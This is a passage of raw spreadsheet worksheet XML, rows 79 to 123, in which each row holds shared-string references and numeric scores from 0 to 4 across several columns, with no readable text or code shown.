      <c r="B79" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C79" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D79" s="1" t="s">
        <v>167</v>
      </c>
      <c r="E79" s="11">
        <v>2</v>
      </c>
      <c r="F79" s="3" t="s">
        <v>437</v>
      </c>
      <c r="G79" s="11">
        <v>0</v>
      </c>
      <c r="H79" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I79" s="11">
        <v>2</v>
      </c>
      <c r="J79" s="3" t="s">
        <v>507</v>
      </c>
    </row>
    <row r="80" spans="1:10" ht="165" x14ac:dyDescent="0.2">
      <c r="A80" s="1" t="s">
        <v>96</v>
      </c>
      <c r="B80" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C80" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D80" s="1" t="s">
        <v>97</v>
      </c>
      <c r="E80" s="11">
        <v>2</v>
      </c>
      <c r="F80" s="3" t="s">
        <v>521</v>
      </c>
      <c r="G80" s="11">
        <v>0</v>
      </c>
      <c r="H80" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I80" s="11">
        <v>0</v>
      </c>
      <c r="J80" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="81" spans="1:10" ht="225" x14ac:dyDescent="0.2">
      <c r="A81" s="1" t="s">
        <v>168</v>
      </c>
      <c r="B81" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C81" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D81" s="1" t="s">
        <v>169</v>
      </c>
      <c r="E81" s="11">
        <v>3</v>
      </c>
      <c r="F81" s="3" t="s">
        <v>521</v>
      </c>
      <c r="G81" s="11">
        <v>0</v>
      </c>
      <c r="H81" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I81" s="11">
        <v>0</v>
      </c>
      <c r="J81" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="82" spans="1:10" ht="150" x14ac:dyDescent="0.2">
      <c r="A82" s="1" t="s">
        <v>170</v>
      </c>
      <c r="B82" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C82" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D82" s="1" t="s">
        <v>171</v>
      </c>
      <c r="E82" s="11">
        <v>2</v>
      </c>
      <c r="F82" s="3" t="s">
        <v>437</v>
      </c>
      <c r="G82" s="11">
        <v>0</v>
      </c>
      <c r="H82" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I82" s="11">
        <v>0</v>
      </c>
      <c r="J82" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="83" spans="1:10" ht="285" x14ac:dyDescent="0.2">
      <c r="A83" s="1" t="s">
        <v>172</v>
      </c>
      <c r="B83" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C83" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D83" s="1" t="s">
        <v>173</v>
      </c>
      <c r="E83" s="11">
        <v>1</v>
      </c>
      <c r="F83" s="3" t="s">
        <v>526</v>
      </c>
      <c r="G83" s="11">
        <v>0</v>
      </c>
      <c r="H83" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I83" s="11">
        <v>0</v>
      </c>
      <c r="J83" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="84" spans="1:10" ht="120" x14ac:dyDescent="0.2">
      <c r="A84" s="1" t="s">
        <v>174</v>
      </c>
      <c r="B84" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C84" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D84" s="1" t="s">
        <v>175</v>
      </c>
      <c r="E84" s="11">
        <v>2</v>
      </c>
      <c r="F84" s="3" t="s">
        <v>521</v>
      </c>
      <c r="G84" s="11">
        <v>0</v>
      </c>
      <c r="H84" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I84" s="11">
        <v>0</v>
      </c>
      <c r="J84" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="85" spans="1:10" ht="165" x14ac:dyDescent="0.2">
      <c r="A85" s="1" t="s">
        <v>176</v>
      </c>
      <c r="B85" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C85" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D85" s="1" t="s">
        <v>177</v>
      </c>
      <c r="E85" s="11">
        <v>1</v>
      </c>
      <c r="F85" s="3" t="s">
        <v>542</v>
      </c>
      <c r="G85" s="11">
        <v>0</v>
      </c>
      <c r="H85" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I85" s="11">
        <v>0</v>
      </c>
      <c r="J85" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="86" spans="1:10" ht="240" x14ac:dyDescent="0.2">
      <c r="A86" s="1" t="s">
        <v>178</v>
      </c>
      <c r="B86" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C86" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D86" s="1" t="s">
        <v>179</v>
      </c>
      <c r="E86" s="11">
        <v>2</v>
      </c>
      <c r="F86" s="3" t="s">
        <v>521</v>
      </c>
      <c r="G86" s="11">
        <v>0</v>
      </c>
      <c r="H86" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I86" s="11">
        <v>0</v>
      </c>
      <c r="J86" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="87" spans="1:10" ht="120" x14ac:dyDescent="0.2">
      <c r="A87" s="1" t="s">
        <v>106</v>
      </c>
      <c r="B87" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C87" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D87" s="1" t="s">
        <v>107</v>
      </c>
      <c r="E87" s="11">
        <v>1</v>
      </c>
      <c r="F87" s="3" t="s">
        <v>521</v>
      </c>
      <c r="G87" s="11">
        <v>0</v>
      </c>
      <c r="H87" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I87" s="11">
        <v>0</v>
      </c>
      <c r="J87" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="88" spans="1:10" ht="345" x14ac:dyDescent="0.2">
      <c r="A88" s="1" t="s">
        <v>67</v>
      </c>
      <c r="B88" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C88" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D88" s="1" t="s">
        <v>180</v>
      </c>
      <c r="E88" s="11">
        <v>3</v>
      </c>
      <c r="F88" s="3" t="s">
        <v>551</v>
      </c>
      <c r="G88" s="11">
        <v>4</v>
      </c>
      <c r="H88" s="3" t="s">
        <v>439</v>
      </c>
      <c r="I88" s="11">
        <v>2</v>
      </c>
      <c r="J88" s="3" t="s">
        <v>442</v>
      </c>
    </row>
    <row r="89" spans="1:10" ht="150" x14ac:dyDescent="0.2">
      <c r="A89" s="1" t="s">
        <v>181</v>
      </c>
      <c r="B89" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C89" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D89" s="1" t="s">
        <v>182</v>
      </c>
      <c r="E89" s="11">
        <v>2</v>
      </c>
      <c r="F89" s="3" t="s">
        <v>559</v>
      </c>
      <c r="G89" s="11">
        <v>4</v>
      </c>
      <c r="H89" s="3" t="s">
        <v>439</v>
      </c>
      <c r="I89" s="11">
        <v>3</v>
      </c>
      <c r="J89" s="3" t="s">
        <v>560</v>
      </c>
    </row>
    <row r="90" spans="1:10" ht="135" x14ac:dyDescent="0.2">
      <c r="A90" s="1" t="s">
        <v>183</v>
      </c>
      <c r="B90" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C90" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D90" s="1" t="s">
        <v>184</v>
      </c>
      <c r="E90" s="11">
        <v>3</v>
      </c>
      <c r="F90" s="3" t="s">
        <v>558</v>
      </c>
      <c r="G90" s="11">
        <v>0</v>
      </c>
      <c r="H90" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I90" s="11">
        <v>2</v>
      </c>
      <c r="J90" s="3" t="s">
        <v>556</v>
      </c>
    </row>
    <row r="91" spans="1:10" ht="300" x14ac:dyDescent="0.2">
      <c r="A91" s="1" t="s">
        <v>185</v>
      </c>
      <c r="B91" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C91" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D91" s="1" t="s">
        <v>186</v>
      </c>
      <c r="E91" s="11">
        <v>3</v>
      </c>
      <c r="F91" s="3" t="s">
        <v>521</v>
      </c>
      <c r="G91" s="11">
        <v>0</v>
      </c>
      <c r="H91" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I91" s="11">
        <v>0</v>
      </c>
      <c r="J91" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="92" spans="1:10" ht="285" x14ac:dyDescent="0.2">
      <c r="A92" s="1" t="s">
        <v>187</v>
      </c>
      <c r="B92" s="1" t="s">
        <v>188</v>
      </c>
      <c r="C92" s="1" t="s">
        <v>189</v>
      </c>
      <c r="D92" s="1" t="s">
        <v>190</v>
      </c>
      <c r="E92" s="11">
        <v>2</v>
      </c>
      <c r="F92" s="3" t="s">
        <v>453</v>
      </c>
      <c r="G92" s="11">
        <v>4</v>
      </c>
      <c r="H92" s="3" t="s">
        <v>454</v>
      </c>
      <c r="I92" s="11">
        <v>1</v>
      </c>
      <c r="J92" s="3" t="s">
        <v>455</v>
      </c>
    </row>
    <row r="93" spans="1:10" ht="120" x14ac:dyDescent="0.2">
      <c r="A93" s="1" t="s">
        <v>191</v>
      </c>
      <c r="B93" s="1" t="s">
        <v>188</v>
      </c>
      <c r="C93" s="1" t="s">
        <v>189</v>
      </c>
      <c r="D93" s="1" t="s">
        <v>192</v>
      </c>
      <c r="E93" s="11">
        <v>2</v>
      </c>
      <c r="F93" s="3" t="s">
        <v>453</v>
      </c>
      <c r="G93" s="11">
        <v>4</v>
      </c>
      <c r="H93" s="3" t="s">
        <v>454</v>
      </c>
      <c r="I93" s="11">
        <v>1</v>
      </c>
      <c r="J93" s="3" t="s">
        <v>455</v>
      </c>
    </row>
    <row r="94" spans="1:10" ht="240" x14ac:dyDescent="0.2">
      <c r="A94" s="1" t="s">
        <v>193</v>
      </c>
      <c r="B94" s="1" t="s">
        <v>188</v>
      </c>
      <c r="C94" s="1" t="s">
        <v>189</v>
      </c>
      <c r="D94" s="1" t="s">
        <v>194</v>
      </c>
      <c r="E94" s="11">
        <v>2</v>
      </c>
      <c r="F94" s="3" t="s">
        <v>459</v>
      </c>
      <c r="G94" s="11">
        <v>4</v>
      </c>
      <c r="H94" s="3" t="s">
        <v>439</v>
      </c>
      <c r="I94" s="11">
        <v>3</v>
      </c>
      <c r="J94" s="3" t="s">
        <v>440</v>
      </c>
    </row>
    <row r="95" spans="1:10" ht="60" x14ac:dyDescent="0.2">
      <c r="A95" s="1" t="s">
        <v>195</v>
      </c>
      <c r="B95" s="1" t="s">
        <v>188</v>
      </c>
      <c r="C95" s="1" t="s">
        <v>189</v>
      </c>
      <c r="D95" s="1" t="s">
        <v>196</v>
      </c>
      <c r="E95" s="11">
        <v>2</v>
      </c>
      <c r="F95" s="3" t="s">
        <v>461</v>
      </c>
      <c r="G95" s="11">
        <v>4</v>
      </c>
      <c r="H95" s="3" t="s">
        <v>454</v>
      </c>
      <c r="I95" s="11">
        <v>1</v>
      </c>
      <c r="J95" s="3" t="s">
        <v>440</v>
      </c>
    </row>
    <row r="96" spans="1:10" ht="165" x14ac:dyDescent="0.2">
      <c r="A96" s="1" t="s">
        <v>197</v>
      </c>
      <c r="B96" s="1" t="s">
        <v>188</v>
      </c>
      <c r="C96" s="1" t="s">
        <v>189</v>
      </c>
      <c r="D96" s="1" t="s">
        <v>198</v>
      </c>
      <c r="E96" s="11">
        <v>2</v>
      </c>
      <c r="F96" s="3" t="s">
        <v>461</v>
      </c>
      <c r="G96" s="11">
        <v>4</v>
      </c>
      <c r="H96" s="3" t="s">
        <v>439</v>
      </c>
      <c r="I96" s="11">
        <v>0</v>
      </c>
      <c r="J96" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="97" spans="1:10" ht="75" x14ac:dyDescent="0.2">
      <c r="A97" s="1" t="s">
        <v>199</v>
      </c>
      <c r="B97" s="1" t="s">
        <v>188</v>
      </c>
      <c r="C97" s="1" t="s">
        <v>189</v>
      </c>
      <c r="D97" s="1" t="s">
        <v>200</v>
      </c>
      <c r="E97" s="11">
        <v>2</v>
      </c>
      <c r="F97" s="3" t="s">
        <v>465</v>
      </c>
      <c r="G97" s="11">
        <v>1</v>
      </c>
      <c r="H97" s="3" t="s">
        <v>466</v>
      </c>
      <c r="I97" s="11">
        <v>3</v>
      </c>
      <c r="J97" s="3" t="s">
        <v>466</v>
      </c>
    </row>
    <row r="98" spans="1:10" ht="120" x14ac:dyDescent="0.2">
      <c r="A98" s="1" t="s">
        <v>201</v>
      </c>
      <c r="B98" s="1" t="s">
        <v>188</v>
      </c>
      <c r="C98" s="1" t="s">
        <v>189</v>
      </c>
      <c r="D98" s="1" t="s">
        <v>202</v>
      </c>
      <c r="E98" s="11">
        <v>1</v>
      </c>
      <c r="F98" s="3" t="s">
        <v>467</v>
      </c>
      <c r="G98" s="11">
        <v>1</v>
      </c>
      <c r="H98" s="3" t="s">
        <v>467</v>
      </c>
      <c r="I98" s="11">
        <v>3</v>
      </c>
      <c r="J98" s="3" t="s">
        <v>467</v>
      </c>
    </row>
    <row r="99" spans="1:10" ht="240" x14ac:dyDescent="0.2">
      <c r="A99" s="1" t="s">
        <v>203</v>
      </c>
      <c r="B99" s="1" t="s">
        <v>188</v>
      </c>
      <c r="C99" s="1" t="s">
        <v>189</v>
      </c>
      <c r="D99" s="1" t="s">
        <v>204</v>
      </c>
      <c r="E99" s="11">
        <v>0</v>
      </c>
      <c r="F99" s="3" t="s">
        <v>484</v>
      </c>
      <c r="G99" s="11">
        <v>0</v>
      </c>
      <c r="H99" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I99" s="11">
        <v>0</v>
      </c>
      <c r="J99" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="100" spans="1:10" ht="45" x14ac:dyDescent="0.2">
      <c r="A100" s="1" t="s">
        <v>205</v>
      </c>
      <c r="B100" s="1" t="s">
        <v>188</v>
      </c>
      <c r="C100" s="1" t="s">
        <v>189</v>
      </c>
      <c r="D100" s="1" t="s">
        <v>206</v>
      </c>
      <c r="E100" s="11">
        <v>2</v>
      </c>
      <c r="F100" s="3" t="s">
        <v>493</v>
      </c>
      <c r="G100" s="11">
        <v>3</v>
      </c>
      <c r="H100" s="3" t="s">
        <v>439</v>
      </c>
      <c r="I100" s="11">
        <v>0</v>
      </c>
      <c r="J100" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="101" spans="1:10" ht="270" x14ac:dyDescent="0.2">
      <c r="A101" s="1" t="s">
        <v>207</v>
      </c>
      <c r="B101" s="1" t="s">
        <v>188</v>
      </c>
      <c r="C101" s="1" t="s">
        <v>189</v>
      </c>
      <c r="D101" s="1" t="s">
        <v>208</v>
      </c>
      <c r="E101" s="11">
        <v>2</v>
      </c>
      <c r="F101" s="3" t="s">
        <v>459</v>
      </c>
      <c r="G101" s="11">
        <v>4</v>
      </c>
      <c r="H101" s="3" t="s">
        <v>439</v>
      </c>
      <c r="I101" s="11">
        <v>0</v>
      </c>
      <c r="J101" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="102" spans="1:10" ht="105" x14ac:dyDescent="0.2">
      <c r="A102" s="1" t="s">
        <v>209</v>
      </c>
      <c r="B102" s="1" t="s">
        <v>188</v>
      </c>
      <c r="C102" s="1" t="s">
        <v>189</v>
      </c>
      <c r="D102" s="1" t="s">
        <v>210</v>
      </c>
      <c r="E102" s="11">
        <v>2</v>
      </c>
      <c r="F102" s="3" t="s">
        <v>459</v>
      </c>
      <c r="G102" s="11">
        <v>4</v>
      </c>
      <c r="H102" s="3" t="s">
        <v>439</v>
      </c>
      <c r="I102" s="11">
        <v>0</v>
      </c>
      <c r="J102" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="103" spans="1:10" ht="75" x14ac:dyDescent="0.2">
      <c r="A103" s="1" t="s">
        <v>211</v>
      </c>
      <c r="B103" s="1" t="s">
        <v>188</v>
      </c>
      <c r="C103" s="1" t="s">
        <v>189</v>
      </c>
      <c r="D103" s="1" t="s">
        <v>212</v>
      </c>
      <c r="E103" s="11">
        <v>2</v>
      </c>
      <c r="F103" s="3" t="s">
        <v>459</v>
      </c>
      <c r="G103" s="11">
        <v>4</v>
      </c>
      <c r="H103" s="3" t="s">
        <v>439</v>
      </c>
      <c r="I103" s="11">
        <v>0</v>
      </c>
      <c r="J103" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="104" spans="1:10" ht="270" x14ac:dyDescent="0.2">
      <c r="A104" s="1" t="s">
        <v>213</v>
      </c>
      <c r="B104" s="1" t="s">
        <v>188</v>
      </c>
      <c r="C104" s="1" t="s">
        <v>189</v>
      </c>
      <c r="D104" s="1" t="s">
        <v>214</v>
      </c>
      <c r="E104" s="11">
        <v>2</v>
      </c>
      <c r="F104" s="3" t="s">
        <v>459</v>
      </c>
      <c r="G104" s="11">
        <v>0</v>
      </c>
      <c r="H104" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I104" s="11">
        <v>0</v>
      </c>
      <c r="J104" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="105" spans="1:10" ht="135" x14ac:dyDescent="0.2">
      <c r="A105" s="1" t="s">
        <v>215</v>
      </c>
      <c r="B105" s="1" t="s">
        <v>188</v>
      </c>
      <c r="C105" s="1" t="s">
        <v>189</v>
      </c>
      <c r="D105" s="1" t="s">
        <v>216</v>
      </c>
      <c r="E105" s="11">
        <v>2</v>
      </c>
      <c r="F105" s="3" t="s">
        <v>543</v>
      </c>
      <c r="G105" s="11">
        <v>4</v>
      </c>
      <c r="H105" s="3" t="s">
        <v>439</v>
      </c>
      <c r="I105" s="11">
        <v>3</v>
      </c>
      <c r="J105" s="3" t="s">
        <v>440</v>
      </c>
    </row>
    <row r="106" spans="1:10" ht="135" x14ac:dyDescent="0.2">
      <c r="A106" s="1" t="s">
        <v>217</v>
      </c>
      <c r="B106" s="1" t="s">
        <v>188</v>
      </c>
      <c r="C106" s="1" t="s">
        <v>189</v>
      </c>
      <c r="D106" s="1" t="s">
        <v>218</v>
      </c>
      <c r="E106" s="11">
        <v>1</v>
      </c>
      <c r="G106" s="11">
        <v>0</v>
      </c>
      <c r="H106" s="3" t="s">
        <v>544</v>
      </c>
      <c r="I106" s="11">
        <v>0</v>
      </c>
      <c r="J106" s="3" t="s">
        <v>545</v>
      </c>
    </row>
    <row r="107" spans="1:10" ht="180" x14ac:dyDescent="0.2">
      <c r="A107" s="1" t="s">
        <v>219</v>
      </c>
      <c r="B107" s="1" t="s">
        <v>188</v>
      </c>
      <c r="C107" s="1" t="s">
        <v>189</v>
      </c>
      <c r="D107" s="1" t="s">
        <v>220</v>
      </c>
      <c r="E107" s="11">
        <v>2</v>
      </c>
      <c r="F107" s="3" t="s">
        <v>543</v>
      </c>
      <c r="G107" s="11">
        <v>4</v>
      </c>
      <c r="H107" s="3" t="s">
        <v>439</v>
      </c>
      <c r="I107" s="11">
        <v>3</v>
      </c>
      <c r="J107" s="3" t="s">
        <v>440</v>
      </c>
    </row>
    <row r="108" spans="1:10" ht="30" x14ac:dyDescent="0.2">
      <c r="A108" s="1" t="s">
        <v>221</v>
      </c>
      <c r="B108" s="1" t="s">
        <v>188</v>
      </c>
      <c r="C108" s="1" t="s">
        <v>189</v>
      </c>
      <c r="D108" s="1" t="s">
        <v>222</v>
      </c>
      <c r="E108" s="11">
        <v>3</v>
      </c>
      <c r="F108" s="3" t="s">
        <v>552</v>
      </c>
      <c r="G108" s="11">
        <v>4</v>
      </c>
      <c r="H108" s="3" t="s">
        <v>439</v>
      </c>
      <c r="I108" s="11">
        <v>1</v>
      </c>
      <c r="J108" s="3" t="s">
        <v>442</v>
      </c>
    </row>
    <row r="109" spans="1:10" ht="300" x14ac:dyDescent="0.2">
      <c r="A109" s="1" t="s">
        <v>223</v>
      </c>
      <c r="B109" s="1" t="s">
        <v>188</v>
      </c>
      <c r="C109" s="1" t="s">
        <v>189</v>
      </c>
      <c r="D109" s="1" t="s">
        <v>224</v>
      </c>
      <c r="E109" s="11">
        <v>1</v>
      </c>
      <c r="F109" s="3" t="s">
        <v>561</v>
      </c>
      <c r="G109" s="11">
        <v>4</v>
      </c>
      <c r="H109" s="3" t="s">
        <v>439</v>
      </c>
      <c r="I109" s="11">
        <v>0</v>
      </c>
      <c r="J109" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="110" spans="1:10" ht="409.6" x14ac:dyDescent="0.2">
      <c r="A110" s="1" t="s">
        <v>225</v>
      </c>
      <c r="B110" s="1" t="s">
        <v>226</v>
      </c>
      <c r="C110" s="1" t="s">
        <v>227</v>
      </c>
      <c r="D110" s="1" t="s">
        <v>228</v>
      </c>
      <c r="E110" s="11">
        <v>1</v>
      </c>
      <c r="F110" s="1" t="s">
        <v>419</v>
      </c>
      <c r="G110" s="11">
        <v>0</v>
      </c>
      <c r="H110" s="3" t="s">
        <v>420</v>
      </c>
      <c r="I110" s="11">
        <v>0</v>
      </c>
      <c r="J110" s="3" t="s">
        <v>421</v>
      </c>
    </row>
    <row r="111" spans="1:10" ht="225" x14ac:dyDescent="0.2">
      <c r="A111" s="1" t="s">
        <v>118</v>
      </c>
      <c r="B111" s="1" t="s">
        <v>226</v>
      </c>
      <c r="C111" s="1" t="s">
        <v>227</v>
      </c>
      <c r="D111" s="1" t="s">
        <v>229</v>
      </c>
      <c r="E111" s="11">
        <v>3</v>
      </c>
      <c r="F111" s="1" t="s">
        <v>424</v>
      </c>
      <c r="G111" s="11">
        <v>3</v>
      </c>
      <c r="H111" s="3" t="s">
        <v>425</v>
      </c>
      <c r="I111" s="11">
        <v>2</v>
      </c>
      <c r="J111" s="3" t="s">
        <v>426</v>
      </c>
    </row>
    <row r="112" spans="1:10" ht="210" x14ac:dyDescent="0.2">
      <c r="A112" s="1" t="s">
        <v>120</v>
      </c>
      <c r="B112" s="1" t="s">
        <v>226</v>
      </c>
      <c r="C112" s="1" t="s">
        <v>227</v>
      </c>
      <c r="D112" s="1" t="s">
        <v>121</v>
      </c>
      <c r="E112" s="11">
        <v>1</v>
      </c>
      <c r="F112" s="3" t="s">
        <v>434</v>
      </c>
      <c r="G112" s="11">
        <v>0</v>
      </c>
      <c r="H112" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I112" s="11">
        <v>0</v>
      </c>
      <c r="J112" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="113" spans="1:10" ht="195" x14ac:dyDescent="0.2">
      <c r="A113" s="1" t="s">
        <v>122</v>
      </c>
      <c r="B113" s="1" t="s">
        <v>226</v>
      </c>
      <c r="C113" s="1" t="s">
        <v>227</v>
      </c>
      <c r="D113" s="1" t="s">
        <v>230</v>
      </c>
      <c r="E113" s="11">
        <v>1</v>
      </c>
      <c r="F113" s="3" t="s">
        <v>434</v>
      </c>
      <c r="G113" s="11">
        <v>0</v>
      </c>
      <c r="H113" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I113" s="11">
        <v>0</v>
      </c>
      <c r="J113" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="114" spans="1:10" ht="135" x14ac:dyDescent="0.2">
      <c r="A114" s="1" t="s">
        <v>124</v>
      </c>
      <c r="B114" s="1" t="s">
        <v>226</v>
      </c>
      <c r="C114" s="1" t="s">
        <v>227</v>
      </c>
      <c r="D114" s="1" t="s">
        <v>231</v>
      </c>
      <c r="E114" s="11">
        <v>3</v>
      </c>
      <c r="F114" s="3" t="s">
        <v>436</v>
      </c>
      <c r="G114" s="11">
        <v>0</v>
      </c>
      <c r="H114" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I114" s="11">
        <v>0</v>
      </c>
      <c r="J114" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="115" spans="1:10" ht="409.6" x14ac:dyDescent="0.2">
      <c r="A115" s="1" t="s">
        <v>232</v>
      </c>
      <c r="B115" s="1" t="s">
        <v>226</v>
      </c>
      <c r="C115" s="1" t="s">
        <v>227</v>
      </c>
      <c r="D115" s="1" t="s">
        <v>233</v>
      </c>
      <c r="E115" s="11">
        <v>1</v>
      </c>
      <c r="F115" s="3" t="s">
        <v>449</v>
      </c>
      <c r="G115" s="11">
        <v>0</v>
      </c>
      <c r="H115" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I115" s="11">
        <v>0</v>
      </c>
      <c r="J115" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="116" spans="1:10" ht="120" x14ac:dyDescent="0.2">
      <c r="A116" s="1" t="s">
        <v>142</v>
      </c>
      <c r="B116" s="1" t="s">
        <v>226</v>
      </c>
      <c r="C116" s="1" t="s">
        <v>227</v>
      </c>
      <c r="D116" s="1" t="s">
        <v>234</v>
      </c>
      <c r="E116" s="11">
        <v>3</v>
      </c>
      <c r="F116" s="3" t="s">
        <v>476</v>
      </c>
      <c r="G116" s="11">
        <v>0</v>
      </c>
      <c r="H116" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I116" s="11">
        <v>0</v>
      </c>
      <c r="J116" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="117" spans="1:10" ht="270" x14ac:dyDescent="0.2">
      <c r="A117" s="1" t="s">
        <v>235</v>
      </c>
      <c r="B117" s="1" t="s">
        <v>226</v>
      </c>
      <c r="C117" s="1" t="s">
        <v>227</v>
      </c>
      <c r="D117" s="1" t="s">
        <v>236</v>
      </c>
      <c r="E117" s="11">
        <v>2</v>
      </c>
      <c r="F117" s="3" t="s">
        <v>490</v>
      </c>
      <c r="G117" s="11">
        <v>0</v>
      </c>
      <c r="H117" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I117" s="11">
        <v>0</v>
      </c>
      <c r="J117" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="118" spans="1:10" ht="150" x14ac:dyDescent="0.2">
      <c r="A118" s="1" t="s">
        <v>237</v>
      </c>
      <c r="B118" s="1" t="s">
        <v>226</v>
      </c>
      <c r="C118" s="1" t="s">
        <v>227</v>
      </c>
      <c r="D118" s="1" t="s">
        <v>238</v>
      </c>
      <c r="E118" s="11">
        <v>0</v>
      </c>
      <c r="F118" s="3" t="s">
        <v>492</v>
      </c>
      <c r="G118" s="11">
        <v>0</v>
      </c>
      <c r="H118" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I118" s="11">
        <v>0</v>
      </c>
      <c r="J118" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="119" spans="1:10" ht="75" x14ac:dyDescent="0.2">
      <c r="A119" s="1" t="s">
        <v>146</v>
      </c>
      <c r="B119" s="1" t="s">
        <v>226</v>
      </c>
      <c r="C119" s="1" t="s">
        <v>227</v>
      </c>
      <c r="D119" s="1" t="s">
        <v>239</v>
      </c>
      <c r="E119" s="11">
        <v>1</v>
      </c>
      <c r="F119" s="3" t="s">
        <v>497</v>
      </c>
      <c r="G119" s="11">
        <v>0</v>
      </c>
      <c r="H119" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I119" s="11">
        <v>0</v>
      </c>
      <c r="J119" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="120" spans="1:10" ht="330" x14ac:dyDescent="0.2">
      <c r="A120" s="1" t="s">
        <v>152</v>
      </c>
      <c r="B120" s="1" t="s">
        <v>226</v>
      </c>
      <c r="C120" s="1" t="s">
        <v>227</v>
      </c>
      <c r="D120" s="1" t="s">
        <v>153</v>
      </c>
      <c r="E120" s="11">
        <v>1</v>
      </c>
      <c r="F120" s="3" t="s">
        <v>506</v>
      </c>
      <c r="G120" s="11">
        <v>0</v>
      </c>
      <c r="H120" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I120" s="11">
        <v>1</v>
      </c>
      <c r="J120" s="3" t="s">
        <v>507</v>
      </c>
    </row>
    <row r="121" spans="1:10" ht="195" x14ac:dyDescent="0.2">
      <c r="A121" s="1" t="s">
        <v>160</v>
      </c>
      <c r="B121" s="1" t="s">
        <v>226</v>
      </c>
      <c r="C121" s="1" t="s">
        <v>227</v>
      </c>
      <c r="D121" s="1" t="s">
        <v>161</v>
      </c>
      <c r="E121" s="11">
        <v>2</v>
      </c>
      <c r="F121" s="3" t="s">
        <v>486</v>
      </c>
      <c r="G121" s="11">
        <v>0</v>
      </c>
      <c r="H121" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I121" s="11">
        <v>0</v>
      </c>
      <c r="J121" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="122" spans="1:10" ht="210" x14ac:dyDescent="0.2">
      <c r="A122" s="1" t="s">
        <v>164</v>
      </c>
      <c r="B122" s="1" t="s">
        <v>226</v>
      </c>
      <c r="C122" s="1" t="s">
        <v>227</v>
      </c>
      <c r="D122" s="1" t="s">
        <v>165</v>
      </c>
      <c r="E122" s="11">
        <v>2</v>
      </c>
      <c r="F122" s="3" t="s">
        <v>523</v>
      </c>
      <c r="G122" s="11">
        <v>0</v>
      </c>
      <c r="H122" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I122" s="11">
        <v>0</v>
      </c>
      <c r="J122" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="123" spans="1:10" ht="225" x14ac:dyDescent="0.2">
      <c r="A123" s="1" t="s">
        <v>166</v>
      </c>
      <c r="B123" s="1" t="s">
        <v>226</v>
      </c>
      <c r="C123" s="1" t="s">
        <v>227</v>
      </c>
      <c r="D123" s="1" t="s">
        <v>167</v>
      </c>
      <c r="E123" s="11">
        <v>2</v>
      </c>
      <c r="F123" s="3" t="s">
        <v>437</v>
      </c>
